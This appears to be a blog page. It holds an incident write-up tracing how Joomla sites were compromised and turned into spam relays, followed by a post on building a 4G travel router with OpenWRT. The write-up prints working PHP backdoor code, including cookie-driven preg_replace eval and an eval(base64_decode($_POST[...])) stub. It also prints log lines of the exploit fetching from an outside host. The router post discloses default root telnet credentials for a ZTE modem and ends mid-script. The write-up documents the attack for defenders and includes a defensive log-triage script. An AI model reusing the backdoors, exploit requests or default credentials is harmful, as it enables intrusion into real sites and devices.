Last year, there was a similar campaign that also used Joomla sites, as well as WordPress, to send spam. It was officially known as “Rodecap”; you can find a good write-up on it here: http://www.abuse.ch/?tag=rodecap What made it unusual was that the IPs hitting the malicious PHP script were in fact infected Windows boxes. This one, which I’m calling i59 (due to the absence of any other name), appears to be the replacement for our old friend Rodecap. It’s called i59 due to the extensive use of the $i59 variable within the script.

This was mostly uncovered using log diving, grep, and a shitload of caffeine.

Please note the filenames here are what I discovered in this particular instance of an i59 infection. It seems each case has a different place where things are stored, named, etc.

Anything I’ve got wrong, please let me know! I’ve had very ample time to properly look into this…

The story begins, initial vector

It appears that this all started around the 24/25th of May 2014, the exploit in question is this one: http://www.exploit-db.com/exploits/17995/ – From my research, it looks like this has already been patched by the nonumber developer.

188.208.33.18 - - [24/May/2014:03:25:01 +1000] "POST /index.php?nn_qp=1&url=http://5.34.177.110/about/ HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20130101 Firefox/10.0"
188.208.33.18 - - [24/May/2014:03:25:04 +1000] "POST /index.php?nn_qp=1&url=http://www.nonumber.nl/about/ HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20130101 Firefox/10.0"
188.208.33.18 - - [24/May/2014:03:25:06 +1000] "POST /components/a.php HTTP/1.1" 200 143 "-" "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20130101 Firefox/10.0"
188.208.33.18 - - [24/May/2014:03:25:08 +1000] "GET /components/4idf49.php HTTP/1.1" 200 62084 "-" "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20130101 Firefox/10.0"

The IP 5.34.177.110 doesn’t respond to anything at the moment. Either it was withdrawn or destroyed, but the IP belongs to a Hosting mob from Ukraine, to be specific, the town of Kharkiv. This looks as if it would have had the remote shell, however without the full POST data I cannot tell for sure.

Secondly, our first actor, 188.208.33.18 from Romania, is always the IP that injects and establishes the foothold on the Joomla site it has infected.

The first thing it puts on the site is a basic PHP script that can be used to gather some information:

md5: 305038e2f82471a683ccdd71078a02d9

# Netscape HTTP Cookie File
# http://curl.haxx.se/rfc/cookie_spec.html
# This file was generated by libcurl! Edit at your own risk.

5.34.177.110    FALSE   /about/ FALSE   0       <?eval(stripslashes(array_pop($_POST)))>       1

Seems to also carry some meta-data.

From there it will have already uploaded the next stage:

md5: ad354405da14c4cdc5957cc84bc2ee49

/**
 * @package     Joomla.Plugin.System
 * @since       1.5
 */
class PlgSysJoomla {
    public function __construct() {
        // Cookie 'Jlma3' names a function (a decoder); it is never validated.
        $file = @$_COOKIE['Jlma3'];
        if ($file) {
            $opt = $file(@$_COOKIE['Jlma2']); // decoded: a second function name
            $au  = $file(@$_COOKIE['Jlma1']); // decoded: the payload
            // "/292/e" with subject 292 fits preg_replace(), whose /e modifier evals $au
            $opt("/292/e", $au, 292);
            die();
        } else {
            phpinfo(); // no cookies: dump phpinfo(), the check the Romanian IP performs
            die;
        }
    }
}

Sneaky fecker pretends to be a part of Joomla. Romania’s role here is to just make sure it returns the phpinfo…

About a week later, Romania comes back and throws some stuff at our fake joomla component:

188.208.33.18 - - [06/Jul/2014:21:45:47 +1000] "POST /components/4idf49.php HTTP/1.1" 200 70 "http://www.google.com" "Mozilla/7.0 (Windows XP 6.1; rv:12.1) Gecko/2014 Firefox/11.1"

This is where the next file is born…

md5sum: 7fdd8a13ae5c0a3ee2713e8c3ddf39d4

Look at the attached file ‘395adn.php’

I haven’t had time to properly dissect this, but I’m sure someone out there would like to. Mostly from inference, guessing and experience, this appears to be a webshell and a file uploader.

From here, there is a bit of silence, It’s possible that this was just the foothold that would be sold-on to whoever wanted a lot of joomla sites to do naughty things with… Might be interesting to see what sort of chatter was going on in the Russian cybercrim forums around this time.

So a month later, we meet a new actor:

37.139.47.122 - - [07/Jul/2014:22:06:04 +1000] "GET /components/com_podcastmedia/395adn.php HTTP/1.1" 200 106 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:06:06 +1000] "POST /components/com_podcastmedia/395adn.php HTTP/1.1" 200 2214 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:06:09 +1000] "POST /components/com_podcastmedia/395adn.php HTTP/1.1" 200 3360 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"

Our friend 37.139.47.122 is from St. Petersburg, Russia.

He will immediately upload his backdoors, as well as spread a whole bunch of shit around. I like to call this the ‘arse spraying mayhem’.


37.139.47.122 - - [07/Jul/2014:22:06:23 +1000] "POST /libraries/getid3/module.audio.bonk.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:06:27 +1000] "POST /modules/mod_banners/mod_banners.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:06:41 +1000] "POST /modules/mod_articles_archive/mod_articles_archive.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:06:54 +1000] "POST /components/com_banners/models/search.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:06:56 +1000] "POST /libraries/fof/toolbar/sql.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:06:58 +1000] "POST /libraries/cms/view/db.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:00 +1000] "POST /components/com_sh404sef/system.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:02 +1000] "POST /media/mediaelements/js/list.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:04 +1000] "POST /libraries/joomla/installer/ajax.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:06 +1000] "POST /media/editors/codemirror/object.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:08 +1000] "POST /components/com_k2/controllers/title.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:10 +1000] "POST /modules/mod_feed/tmpl/help.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:12 +1000] "POST /components/com_mailto/helpers/alias.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:14 +1000] "POST /components/com_content/controllers/sql.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:16 +1000] "POST /plugins/search/contacts/menu.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:18 +1000] "POST /media/system/css/proxy.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:20 +1000] "POST /components/com_jce/options.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:23 +1000] "POST /modules/mod_footer/tmpl/gallery.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:25 +1000] "POST /templates/view.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:27 +1000] "POST /components/com_mailto/themes.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:31 +1000] "POST /logs/menu.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:33 +1000] "POST /libraries/phputf8/utils/page.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"

POSTs are to confirm everything is there and working.

This step drops the following line into a bunch of new files, as well as into the top of some already existing files:

eval(base64_decode($_POST['ne0080b']));

Effectively giving this bot leverage to execute arbitrary PHP from any of its several ‘mini backdoors’.

This IP will also be responsible for maintaining the bot, and making sure that it can still get in.

I’ve also observed this thing messing with file modification times, so it was kinda tricky to properly link this all together.

a few days pass…

37.139.47.243 - - [11/Jul/2014:06:45:48 +1000] "POST /libraries/fof/toolbar/sql.php HTTP/1.1" 200 185 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"

This is where the star of the show is born… i59!

md5sum: 71a7c769e644d8cf3cf32419239212c7

Again, i59 is something I haven’t had the time to properly dissect; even though it is the star of the show, it’s kept me busier trying to track its ass down and stop the machine it has infected from being RBL’d for trying to spam porno links to everyone on AOL and Yahoo.

But this is the component that sends the spam, as evident in the following log snippet:

66.33.212.107 - - [25/Jul/2014:02:53:20 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
210.48.148.152 - - [25/Jul/2014:02:58:57 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 2528 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
210.48.148.152 - - [25/Jul/2014:02:59:10 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 2558 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
210.48.148.152 - - [25/Jul/2014:02:59:22 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 2577 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
210.48.148.152 - - [25/Jul/2014:02:59:34 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 3301 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
210.48.148.152 - - [25/Jul/2014:02:59:43 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
69.89.31.184 - - [25/Jul/2014:03:08:30 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 1614 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
69.89.31.184 - - [25/Jul/2014:03:08:48 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
91.121.12.223 - - [25/Jul/2014:03:09:48 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
77.222.61.150 - - [25/Jul/2014:03:10:38 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 5164 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
77.222.61.150 - - [25/Jul/2014:03:10:49 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 4871 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
77.222.61.150 - - [25/Jul/2014:03:10:57 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 4667 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
77.222.61.150 - - [25/Jul/2014:03:11:08 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 5132 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
77.222.61.150 - - [25/Jul/2014:03:11:16 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
74.220.219.67 - - [25/Jul/2014:03:13:10 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
77.222.56.213 - - [25/Jul/2014:03:14:51 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
77.222.61.243 - - [25/Jul/2014:03:16:37 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 1058 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
77.222.61.243 - - [25/Jul/2014:03:16:49 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
66.147.244.240 - - [25/Jul/2014:03:19:34 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 3203 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
66.147.244.240 - - [25/Jul/2014:03:19:47 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
192.217.112.247 - - [25/Jul/2014:03:21:22 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 3457 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
192.217.112.247 - - [25/Jul/2014:03:21:32 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 3188 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
192.217.112.247 - - [25/Jul/2014:03:21:42 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 3683 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
192.217.112.247 - - [25/Jul/2014:03:21:54 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 3975 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
192.217.112.247 - - [25/Jul/2014:03:22:08 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 2912 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
192.217.112.247 - - [25/Jul/2014:03:22:17 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
66.147.244.153 - - [25/Jul/2014:03:24:02 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 2302 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
92.53.106.199 - - [25/Jul/2014:03:29:24 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 3912 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
92.53.106.199 - - [25/Jul/2014:03:29:44 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 2899 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
92.53.106.199 - - [25/Jul/2014:03:30:13 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 3209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
92.53.106.199 - - [25/Jul/2014:03:30:32 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 3394 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
69.16.199.30 - - [25/Jul/2014:03:35:19 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 2509 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
69.16.199.30 - - [25/Jul/2014:03:35:27 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
199.168.99.123 - - [25/Jul/2014:03:36:12 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
141.105.121.139 - - [25/Jul/2014:03:41:00 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
66.147.244.245 - - [25/Jul/2014:03:42:32 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 3196 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
66.147.244.245 - - [25/Jul/2014:03:42:45 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
192.145.239.8 - - [25/Jul/2014:03:46:24 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 4799 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
192.145.239.8 - - [25/Jul/2014:03:46:34 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 3894 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
192.145.239.8 - - [25/Jul/2014:03:47:13 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 2186 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
192.145.239.8 - - [25/Jul/2014:03:47:31 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 1673 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
192.145.239.8 - - [25/Jul/2014:03:47:50 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 2219 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
192.145.239.8 - - [25/Jul/2014:03:48:01 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 2142 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
192.145.239.8 - - [25/Jul/2014:03:48:31 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"

Why some of these are getting 500s, I’m not sure… It could be the server’s load or a problem in the i59 script itself… Either way it was filling up the mail queue with annoying filth.

UPDATE: The 500s seem to be caused by me setting restrictive FACLs on the Postfix sendmail binary, lol!

[Fri Jul 25 04:13:09 2014] [error] [client 184.107.157.218] sh: /usr/sbin/sendmail: Permission denied
[Fri Jul 25 04:13:09 2014] [error] [client 184.107.157.218] sh: /usr/sbin/sendmail: Permission denied
[Fri Jul 25 04:13:09 2014] [error] [client 184.107.157.218] sh: /usr/sbin/sendmail: Permission denied
[Fri Jul 25 04:13:09 2014] [error] [client 184.107.157.218] sh: /usr/sbin/sendmail: Permission denied

Trololololololololol

All communications of i59 are done with the same User-Agent: "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"

This is where I draw the parallel to Rodecap. I’m unsure what these IPs are, if they’re compromised machines or what. But they supply the spam in encrypted payloads.
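Since every i59 request carries that one User-Agent and every backdoor is driven by a POST straight to a .php file that Joomla would never take a POST on (everything legitimate goes through index.php), both are cheap things to triage from the access log. The script below is an added example of mine, not the post's tooling: it parses Apache combined-format lines, flags on those two signals, and rolls the hits up by client IP and by dropped file. The sample log is constructed for the example; the i59 lines are copied from the snippets above and the benign ones use a documentation-range address.

```python
"""Triage an Apache combined log for i59-style spam-relay traffic.

Added example, not the post's own tooling. Flags the User-Agent the post
attributes to i59 and POSTs to any .php file other than Joomla's entry
points, then summarises by client IP and by target path.
"""
import re
from collections import Counter
from typing import Dict, List, NamedTuple, Optional

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# The User-Agent every i59 request carried in this incident (from the post).
I59_UA = "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"

# Joomla routes every request through these; a POST to any other .php file is
# how the dropped backdoors were driven. Allow-list site-specific exceptions here.
ENTRY_POINTS = ("/index.php", "/administrator/index.php")


class Request(NamedTuple):
    ip: str
    method: str
    path: str
    status: int
    ua: str


def parse_line(line: str) -> Optional[Request]:
    """Parse one combined-format line; None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    path = m["path"].split("?", 1)[0]          # drop the query string
    return Request(m["ip"], m["method"], path, int(m["status"]), m["ua"])


def reasons(req: Request) -> List[str]:
    """Why a request is suspicious; empty list means it looks fine."""
    why = []
    if req.ua == I59_UA:
        why.append("i59-user-agent")
    if req.method == "POST" and req.path.endswith(".php") and req.path not in ENTRY_POINTS:
        why.append("post-to-non-entry-point")
    return why


def triage(lines) -> Dict[str, object]:
    """Return flagged requests plus per-IP and per-path counts."""
    flagged, by_ip, by_path = [], Counter(), Counter()
    for line in lines:
        req = parse_line(line)
        if req is None:
            continue
        why = reasons(req)
        if why:
            flagged.append((req.ip, req.method, req.path, req.status, why))
            by_ip[req.ip] += 1
            by_path[req.path] += 1
    return {"flagged": flagged, "by_ip": dict(by_ip), "backdoor_paths": dict(by_path)}


# Constructed sample: two i59 relay hits, one earlier backdoor check from the
# St. Petersburg IP, and two benign requests from a documentation-range address.
SAMPLE_LOG = """\
210.48.148.152 - - [25/Jul/2014:02:58:57 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 2528 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
210.48.148.152 - - [25/Jul/2014:02:59:43 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
37.139.47.122 - - [07/Jul/2014:22:06:56 +1000] "POST /libraries/fof/toolbar/sql.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
203.0.113.10 - - [25/Jul/2014:03:00:01 +1000] "GET /index.php?option=com_content&view=article&id=7 HTTP/1.1" 200 18233 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/31.0"
203.0.113.10 - - [25/Jul/2014:03:00:09 +1000] "POST /index.php?option=com_users&task=user.login HTTP/1.1" 303 - "http://example.invalid/" "Mozilla/5.0 (X11; Linux x86_64) Firefox/31.0"
"""

if __name__ == "__main__":
    result = triage(SAMPLE_LOG.splitlines())
    for ip, method, path, status, why in result["flagged"]:
        print(f"{ip:<16} {method:<5} {status} {path}  [{', '.join(why)}]")
    print("by IP:", result["by_ip"])
    print("dropped files:", result["backdoor_paths"])
```

The backdoor_paths counter is the useful output during cleanup: it is the list of files to pull and inspect, and the 500s against them (once the sendmail FACL was in place) show which ones are the spam relay rather than a plain shell.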

balls… will have to find a format that gist doesn’t shit its pants over…

Project AWACS

E3 Sentry AWACS (image from Wikipedia)

I had a requirement for 4G on the go that doesn’t cost me $40,000,000 a year to run… Telstra’s Voice and Data Pre-Paid sucks for price.

I wanted something I could use on the way to and from work, and whenever I was out. Something that was low-power and could sit in my bag.

UPDATE I fixed the issue where the usb modem would not show itself as an interface at boot, check the end of the post to find the fix!

Why AWACS?

I have massive planespergers… From Wikipedia:

AWACS or Airborne Warning and Control System is an airborne radar picket system designed to detect aircraft, ships and vehicles at long ranges and perform control and command of the battle space in an air engagement by directing fighter and attack aircraft strikes.

I usually name my wireless stuff after Air Force related things, such as TACAMO (TAke Charge And Move Out – nuclear-war-survivable communications) for my mobile phone tether, and callsigns for static access points, such as “Mainsail” and “Skyking”.

The Setup:

Hardware!

1x TP-Link TL-MR3020 Mobile Access Point – http://wiki.openwrt.org/toh/tp-link/tl-mr3020
– Atheros AR7240 MIPS Processor @ 400MHz
– 32M RAM
– 4M Flash (yes, very tight…)
– 1x USB, 1x Mini-USB (for power input)
– 1x 10/100 Ethernet (for un-fucking with ThinkPad)

1x ZTE MF823 LTE/UMTS USB Modem – http://zte.com.au/telstra/MF823.htm – Has an ARMv7 SoC and runs a Linux kernel, as I found out. (Had root on it less than 10 minutes after it was delivered)

1x Mini-Gorilla Battery Pack. https://www.powertraveller.com/en/shop/portable-chargers/professional/minigorilla/

So, firstly, I needed to install OpenWRT on the TP-Link. This was fairly straightforward with the trunk versions known as Barrier Breaker. TP-Link are bros that don’t dick you around in giving access to the hardware you own, so it was as simple as feeding it OpenWRT as a Firmware Upgrade via the Web Interface :)

Once installed, I opkg’d the niceties and requirements after getting it connected up to my work’s non-privileged wireless :3

opkg update; opkg install ip kmod-usb-net kmod-usb-net-rndis kmod-usb-net-cdc-ether usbutils udev

This will get you the nice new IP tools, as well as all the kernel modules and software required to tether to the ZTE modem (which will present itself as an Ethernet adaptor over USB).

Once Telstra was kind enough to deliver my USB Modem (ok, it wasn’t that bad) I registered it up, and put on 10G that will stay active for 90 days, none of this 30 day bullshit with voice and data. You pay more up-front, but it will last you.

Once all together, we tell the AP what to do:

Since we cannot fit a web interface, let alone LuCI, on this bee’s dick of a flash storage, we need to use the OpenWRT CLI configuration utility, uci.

(Alternatively, you can edit shit directly in /etc/config/network)

uci set wireless.@wifi-iface[0]=wifi-iface
uci set wireless.@wifi-iface[0].device=radio1
uci set wireless.@wifi-iface[0].mode=ap
uci set wireless.@wifi-iface[0].network=wan
uci set wireless.@wifi-iface[0].key=<GOOD PASSPHRASE>
uci set wireless.@wifi-iface[0].ssid=<AN SSID>
uci set wireless.@wifi-iface[0].encryption=psk2+ccmp

Once satisfied (I use AWACS as the SSID), commit the changes:

uci commit

Following this will get your USB tether up and going – http://wiki.openwrt.org/doc/howto/usb.tethering

the tl;dr:

uci del network.wan
uci set network.wan=interface
uci set network.wan.ifname=usb0
uci set network.wan.proto=dhcp
uci commit network

and

ifup wan

How does it go?

Overall, I’m very impressed how it has turned out. Even in a city like Sydney where the 2.4GHz spectrum is literally shitted with Access Points, the close-proximity and power output make this more of a Piconet. People sitting directly next to you or around you on a bus or train will be able to use this without packet loss.

Internet access is very reliable, at around Lunch Time in the Sydney CBD (Heavy use period) I got 21 Mbps down and 17 Mbps up on 4G/LTE.

I’ve now used it on more than a few occasions (two without the modem, one with) and I still have not dropped a bar of energy on the Gorilla. This is one power-efficient setup, let me tell you.

What did impress me was the ability to reach the USB Dongle’s management interfaces still.

The USB dongle will by default make a network of 192.168.0.0/24, whereas OpenWRT will have 192.168.1.0/24, so you can still reach the modem on 192.168.0.1.

Protip:

The ZTE MF823 has Telnet open, here’s the creds:

USER: root
PASS: zte9x15

It has a pretty decent Busybox on it too.

Weird Quirks

Sometimes, the USB modem won’t show up unless you plug it in after the AP boots. If this happens, just do so and run ifup wan from a root shell on the AP, everything will take care of itself from there.

FIXED

The way to solve this is rather silly, but it does work:

For some reason, the rndis_host module is not loaded from /etc/modules-boot.d. To fix this, run:

ln -s /etc/modules.d/usb-net-rndis /etc/modules-boot.d/50-usb-net-rndis

Then add the line /etc/init.d/usbmode restart to /etc/rc.local.

For some reason, the USB stuff has to be restarted once the Access Point comes online. This might be because the ZTE modem and the AP power up at the same time and the AP is ready before the modem is… The restart refreshes things, and your usb0 interface should then pop up at boot!
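The two boot fixes above as one re-runnable script, added here as an example rather than taken from the post. It assumes a ROOT prefix variable (leave it unset on the device) so the changes can be rehearsed against a scratch directory first, and it places the usbmode line before rc.local's closing exit 0, since anything appended after that line never runs.

```shell
#!/bin/sh
# Added example, not the post's own script: apply the two boot fixes above in
# one idempotent step, safe to re-run. ROOT is an assumed prefix so the script
# can be rehearsed against a scratch directory; leave it unset on the device
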